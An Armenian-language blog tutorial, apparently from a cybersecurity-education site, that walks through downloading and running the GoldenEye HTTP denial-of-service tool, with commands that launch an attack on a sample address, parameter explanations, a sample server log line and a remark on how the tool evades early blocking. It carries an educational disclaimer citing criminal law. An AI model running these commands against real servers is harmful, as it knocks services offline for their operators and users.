Ի՞նչպես կատարել DOS հարձակում

GoldenEye ծրագրի միջոցով

Ծրագրի մասին

GoldenEye-ը սթրես թեստավորման գործիք է, որը DOS հարձակման միջոցով անհասանելի է դարձնում համակարգը վայրկյանների ընթացքում` կախված սերվերի pool հիշողության ծավալից: Իհարկե, այն հեշտությամբ բացահայտվում և կանխվում է ճիշտ կարգավորված անվտանգության ապահովման համակարգերի կողմից: Ծրագրավորված է Python-ով:


ՈՒՇԱԴՐՈՒԹՅՈՒՆ:

Բոլոր հրապարակված նյութերը կրում են ուսուցողական բնույթ:

Կիբեռհանցագործությունը պատժվում է ՀՀ օրենքով:

Տես ՝ ՀՀ Քրեական օրենսգրքի 251-257, 181, 144, 137, 140, 166, 182 հոդվածները:


Ծրագրի ներբեռնումը և առաջին մեկնարկը:

Օպերացիոն համակարգը՝ Linux:

Shell` Bash:

$ wget https://github.com/jseidl/GoldenEye/archive/master.zip #ներբեռնում ենք ծրագիրը

$ unzip master.zipcd GoldenEye-master/ #ապաարխիվացնում ենք այն

Գործարկումից առաջ համոզվեք որ համակարգչում կա կարգավորված Python

$ ./goldeneye.py # գործարկում ենք այն

Ձախողման դեպքում փորձեք հետևյալ հրամանով:

$ python goldeneye.py

Վերջին հրամանի արդյունքում կարող ենք տեսնել ծրագրի դոկումենտացիան, օգտագործման կարգը և պարամետրերը:

Ծրագիրը լռելյայն գործարկման համար բավարար է գրել հետևյալ հրամանը իր աշխատանքային միջավայրում:

$ ./goldeneye.py http://192.168.1.1/

Ծրագրի նման կերպ գործարկումը սկսում է հարձակումը նշանակված հասցեի վրա՝ օգտագործելով միաժամանակ 50 հարձակվող դուստր-ծրագիր, 30 միաժամանակ հարցում յուրաքանչյուրի կողմից և տարբեր հարցման մեթոդներ(GET, POST)

Գործարկումից հետո կարող ենք տեսնել նմանատիպ գրառումներ սերվերի լոգերում:

192.168.1.1 – – [18/Jun/2015:17:06:51 +0700] “GET /?vySSDx=tG1rmfX4HbYXBm&CKVuvV=JLoK&nHc8x=0x5YKQtvHs0HWS68 HTTP/1.1” 200 69504 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3)AppleWebKit/535.6 (KHTML, like Gecko) Version/6.0.5 Safari/535.17”

Օգտագործման կարգը և կոնֆիգուրացիան:

GoldenEye-ը բավականին ճկուն գործիք է և  թույլ է տալիս հարձակումը կատարել նախապես նշանակված պարամետրերով՝ նշելով հարցման մեթոդը(GET, POST), միաժամանակ հարձակվողների թիվը, միաժամանակ հաստատվող հարցումների քանակը և այլն:

Փորձենք հետևյալ հրամանը:

$ ./goldeneye.py http://192.168.1.1/ -w 5 -s 10 -m random

Այս հրամանի արդյունքում ծրագիրը կսկսի հարձակումը արդեն նշված պարամետրերով.

-w 5 : միաժամանակ հարձակվողների քանակը ՝ 5:

-s 10 : միաժամանակ հաստատվող հարցումների քանակը՝ 10:

-m random: հարցումների մեթոդը ՝ պատահական սկզբունքով

Cyberious Dos Attack

GoldenEye ծրագրի առավելությունները կայանում են նրանում, որ այն հարձակման ժամանակ օգտագործում է NoCache և KeepAlive հեդերները, ինչպես նաև գեներացնում է տարբեր հարցման պարամետրեր վաղաժամ արգելափակումից խուսափելու համար:

Ծրագրի ողջ դոկումենտացիան և կոդերը կարող եք գտնել այստեղ

Թեմատիկ նյութեր

Անվտանգություն Cyberious կիբեռնորություններ

Կիբեռհարձակումների վնասը 2022-ին

Cyberious | ԿիբեռAcademy 2022 թվականին համաշխարհային տնտեսության համար կիբեռհարձակումների վնասը կարող է հասնել 8-10 տրիլիոն դոլարի Հաքերների գործունեության հետևանքով համաշխարհային ...
Կարդալ
Անվտանգություն Cyberious կիբեռակադեմիաԱնվտանգություն Cyberious կիբեռակադեմիա

Ինչո՞ւ են «կոտրում» համակարգիչը և ում է պետք ձեր տվյալները

Cyberious | ԿիբեռAcademy Ինչո՞ւ են «կոտրում» համակարգիչը և ում է պետք ձեր տվյալները Ինչու պետք է որևէ մեկը ցանկանա «կոտրել» ...
Կարդալ
Անվտանգություն Cyberious կիբեռակադեմիա

Ինչո՞ւ են կարևոր անվտանգության ապահովման համակարգերը

Cyberious | ԿիբեռAcademy Ի՞նչ է տեղեկատվական անվտանգությունը և ինչո՞ւ են կարևոր անվտանգության ապահովման համակարգերը Ի՞նչ է տեղեկատվական անվտանգությունը։ Սովորաբար ...
Կարդալ
Սպամ Cyberious կիբեռակադեմիա

Ի՞նչ է սպամը

Cyberious | ԿիբեռAcademyԻ՞նչ է սպամը What is Spam? Spam-ին ծանոթ է ցանկացած վեբ օգտատեր։ Ընդհանուր առմամբ, սպամը գովազդային նամակների զանգվածային ...
Կարդալ